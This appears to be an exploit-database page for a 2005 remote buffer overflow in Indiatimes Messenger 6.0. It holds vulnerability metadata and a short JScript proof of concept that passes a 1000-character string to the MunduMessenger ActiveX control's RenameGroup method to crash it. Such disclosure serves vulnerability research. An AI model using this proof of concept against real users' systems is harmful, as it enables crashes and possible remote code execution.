header-logo
Suggest Exploit
vendor:
Indiatimes Messenger
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Indiatimes Messenger
Affected Version From: 6
Affected Version To: 6
Patch Exists: YES
Related CWE: N/A
CPE: a:indiatimes:indiatimes_messenger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Indiatimes Messenger Remote Buffer Overflow Vulnerability

Indiatimes Messenger is reported prone to a remote buffer overflow vulnerability. A successful attack may trigger a crash in the client or lead to arbitrary code execution. The attacker may then gain unauthorized remote access in the context of the user running the application. A malicious script can be used to exploit this vulnerability.

Mitigation:

Users should avoid visiting untrusted websites and clicking on suspicious links. It is also recommended to keep the application updated with the latest version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14705/info

Indiatimes Messenger is reported prone to a remote buffer overflow vulnerability.

A successful attack may trigger a crash in the client or lead to arbitrary code execution. The attacker may then gain unauthorized remote access in the context of the user running the application.

Indiatimes Messenger 6.0 is affected by this issue. 

[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";

for(i=0; i<1000; i++)
{
buf += "A";
}

while(obj1.GetServerStatus() != "Logged In"); //wait
till login

obj1.RenameGroup("Friends", buf, 5);
[/script]

Navigation

Suggest Exploit

Services By CQR